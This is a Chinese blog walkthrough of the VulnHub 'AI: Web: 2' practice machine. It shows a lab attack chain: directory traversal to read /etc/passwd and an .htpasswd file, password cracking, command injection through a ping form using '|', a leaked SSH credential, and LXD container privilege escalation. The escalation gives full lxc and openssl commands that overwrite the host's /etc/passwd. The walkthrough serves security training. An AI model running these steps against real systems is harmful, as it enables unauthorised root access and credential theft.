Vulnhub--AI: WEB: 2

已于 2024-06-22 17:09:49 修改
阅读量557 收藏 10
点赞数 7
分类专栏: Vulnhub 文章标签: web安全 网络安全 Linux提权 Linux靶机 Linux容器提权
于 2024-06-18 15:28:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/139774750
版权

渗透复现

平台框架存在目录穿越漏洞,利用该漏洞读取敏感信息

Ping功能点绕过,进行命令执行操作,反弹shell无果后,利用目录穿越漏洞遍历敏感API,读取到用户SSH登录凭证

SSH登录进行Linux lxd容器提权

知识扩展

目录穿越读取敏感文件,BP遍历敏感API

Ping功能通过"|"绕过进行命令执行

Linux lxc/lxd容器提权

靶机地址

AI: Web: 2 ~ VulnHub

主机发现

(1)攻击机

192.168.88.128

(2)目标主机

192.168.88.140

信息收集

端口扫描

端口访问

目录扫描

目录爆破

目录访问

(1)/index.php/login/

(2)/signup.php

(3)/viewing.php

(4)/webadmin

实施攻击

(1)注册账号admin进入后台

(2)后台页面进行扫描和爆破

(3)进行fuzz爆破的时候一直爆文件(可能是因为存在目录穿越漏洞)根据后台CMS历史漏洞搜寻,存在目录穿越

(4)BP抓包构造接口进行访问/etc/passwd,只能拿到用户名

(5)BP遍历敏感文件,在/etc/apache2/.htpasswd文件(apache用户认证文件)中读取到aiweb2admin的账号密码

(6)进行john解密后,登录webadmin后台

(7)根据robots文件的提示进行访问

http://192.168.88.140/webadmin/H05Tpin9555/

http://192.168.88.140/webadmin/S0mextras/

(8)Ping功能可以通过'|'绕过进行命令执行

(9)反弹shell无果,根据/webadmin/S0mextras/页面的提示,进行隐藏文件的查看

ls -al /var/www/html/webadmin/S0mextras/
find . -type -f /var/www/html/webadmin/S0mextras/

(10)隐藏文件/.sshUserCred55512.txt读取到用户的SSH登陆凭证

User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

提权

(1)信息收集

(2)linux容器提权,lxc提权

#创建启动容器,将宿主机的/etc目录挂载至容器
#/tmp目录下新建passwd文件,并且设置root的密码
#上传/tmp目录下新建的passwd文件至容器,成功覆盖宿主机/etc目录下的passwd文件
#可以理解为LXC容器存在漏洞,低权限用户在容器中的操作会同步影响宿主机中的文件,达到低权限操作高权限文件目的
#启动lxc容器 UbuntuMini
#将/etc目录挂载至容器
lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring

#openssl生成root密码 111
openssl passwd -1 -salt root 111
$1$root$vYBCshwm6aJ/2WxkqNyVY/
#将/etc/passwd的内容复制至/tmp目录下新建的passwd中,并且修改root密码
#完成passwd文件操作后,将passwd文件上传至容器
lxc file push passwd UbuntuMini/sharingiscaring/passwd

(3)如果报错

(4)停止该容器,并再次运行容器和执行命令

lxc stop UbuntuMini
lxc start UbuntuMini
lxc file push passwd UbuntuMini/sharingiscaring/passwd

(5)提权成功

Yeah_0day
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
transfer-learning-conv-ai::unicorn:具有转移学习功能的最新会话式AI
02-03
该代码是一个干净且经过注释的代码库,其中包含培训和测试脚本,可用于通过利用从OpenAI GPT和GPT-2 Transformer语言模型进行学习来培训对话代理。 该代码库可用于重现HuggingFace参加NeurIPS 2018对话竞赛的结果...
ai-city-simulation:人工智能城市
02-06
城市模拟自动驾驶汽车模拟VanillaJS + Python + ML(sklearn) 驾驶并收集道路和汽车统计信息的照片通过套接字发送到Python服务器训练模型以预测控制驾驶发送道路照片-从ML接收控制预测
vulnhub靶场渗透系列-- AI:Web:2
lza20001103的博客
10-01 2537
vulnhub靶场渗透系列-- AI:Web:2
vulnhub靶场渗透系列-- AI:web:1
lza20001103的博客
10-02 3834
AI:web:1 文章目录AI:web:1前言靶机地址工具、知识点和漏洞存疑、待解决一、信息收集二、SQL注入三、提权file-dest 写入 webshellFind SUID添加用户名密码到/etc/passwd后记 前言 前面给大家讲解了外网和内网渗透的相关知识和技术,以及各种工具的使用,在我们渗透中都会遇到,接下来我们需要进行靶场的练习和渗透了,这也是一个提升渗透能力的方法,这里给大家推荐几个比较好的额靶场,vulnhub和红日靶场(http://vulnstack.qiyuanxuetang.ne
VulnHub靶机 - AI:Web 2.0
狂吃三碗
04-28 509
VulnHub靶机 - AI:Web 2.0
Vulnhub靶机AI-Web-1.0
羊柳树的博客
01-20 4141
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
Vulnhub靶机渗透之 AI: Web: 1
_Co1a
07-21 1100
靶机下载地址:AI:Web:1 Description: Difficulty: Intermediate Network: DHCP (Automatically assign) Network Mode: NAT This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privi
vulnhub靶机AI:WEB:2
weixin_52450702的博客
10-24 294
在此介绍dirbuster,直接在终端输入dirbuster回车后出现以下界面,填上url和选择字典即可开始扫描,字典所在位置是/usr/share/dirbuster/wordlists。对扫描到的目录进行访问,都是拒绝访问,再次登录192.168.70.152,看到welcome xuezhuli filesharing,去漏洞平台搜索一下。进行注册然后登录,发现页面源码的注释内容,注释掉了上传文件的代码,没什么用。发现webadmin进行访问,发现需要密码,输入刚刚解密出的密码,成功登录。
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1386
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
2、vulnhub-tr0ll-2
qq_42660246的博客
09-18 121
成功登录ssh三种方式,详见链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh。前面找到偏移量之后,可以知道栈空间大小占据空间位置,接下来要找到跳板地址也就是ESP,就可以跳到恶意代码shellcode的位置。类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于。发现下载下来的4个图片中,2.jpg 明显不同,使用16进行编辑器查看。
vulnhub靶机:AI: Web: 1
weixin_52450702的博客
10-23 483
靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/实验时间:2022.10.22这是我第一次写vulnhub靶机的渗透文章,其中部分有参考网上师傅们的文章,尽管这样还是在实验中出现了各种问题,以后会经常更新以下为本次靶机渗透的全部思路。
the-art-of-ai:人工智能存储库
07-18
人工智能的艺术人工智能存储库
ai-object-detection:Web AI对象检测
05-03
这是Web AI对象检测。 您可以在网络浏览器中使用它。 此Web应用程序使用设备的相机检测物体。 :gear: 特征 :check_mark_button: 拨动开关以打开或关闭AI :check_mark_button: 范围滑块可控制帧频 :framed_...
spring-ai-core 0.8.1
最新发布
05-21
《Spring AI Core 0.8.1:开启人工智能之旅》 在现代软件开发领域,Spring框架以其强大的功能和灵活性,已经成为Java开发中的首选框架之一。而Spring AI Core则是Spring生态系统中专门为人工智能(AI)和机器学习...
ai-planner-samples:AI Planner:样本
02-06
AI Planner:样本 欢迎使用的示例资料库。 此存储库中包含以下样本: VacuumRobot-控制机器人以优化其穿越肮脏世界的路径。 Match3-使用计划来解决基于目标的图块匹配难题。 EscapeRoom-通过将三个座席与一个计划...
ai-text-adventure:AI文字冒险
05-31
ai-text-冒险 基于文本冒险游戏示例。 한국어 매뉴얼은 README_KR.md를 참조해 주세요。 该程序正在积极开发,可能不稳定。运行这个游戏先决条件:工作 python 安装推荐:python 3.8.5 和 nvidia 显卡(支持 CUDA ...
AI-cheat-sheet:人工智能备忘单
05-14
#人工智能速查表 该备忘单包含许多关于人工智能的数学公式,方程式,推论和图表。 它们大多数基于Pattern Recognition and Machine Learning , Elements of Statisitical Learning和Machine Learning: A ...
Computer-Vision-and-AI:计算机视觉和人工智能项目的集合
02-04
总之,"Computer-Vision-and-AI"涵盖了从基础的图像处理到复杂的深度学习模型的广泛内容,是学习和实践计算机视觉与人工智能的理想资源。通过这个项目集合,你将有机会深入了解这两个领域的核心概念,并通过实际操作...
Could not find artifact org.springframework.ai:spring-ai-starter:pom:0.0.1 in nexus-aliyun
04-25
在Maven构建项目时,如果出现"Could find artifact"的错误提示,通常是因为Maven无法从指定的仓库中找到所需的依赖项。在你提供的错误信息中,Maven无法在nexus-aliyun仓库中找到org.springframework.ai:spring-ai-starter:pom:0.0.1这个依赖项。 解决这个问题的方法有以下几种: 1. 检查仓库配置:首先确认你的Maven配置文件(settings.xml)中是否正确配置了nexus-aliyun仓库。可以尝试使用浏览器或其他工具访问该仓库,确认是否能够正常访问。 2. 检查依赖项信息:确认依赖项的groupId、artifactId和版本号是否正确。有时候可能是因为依赖项的信息错误导致无法找到。 3. 检查仓库索引:如果你确定依赖项信息正确,并且仓库配置也没有问题,可以尝试清除本地仓库的索引缓存。可以通过删除本地仓库中的".m2/repository"目录下与该依赖项相关的文件夹来实现。然后重新运行Maven命令,让Maven重新下载依赖项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值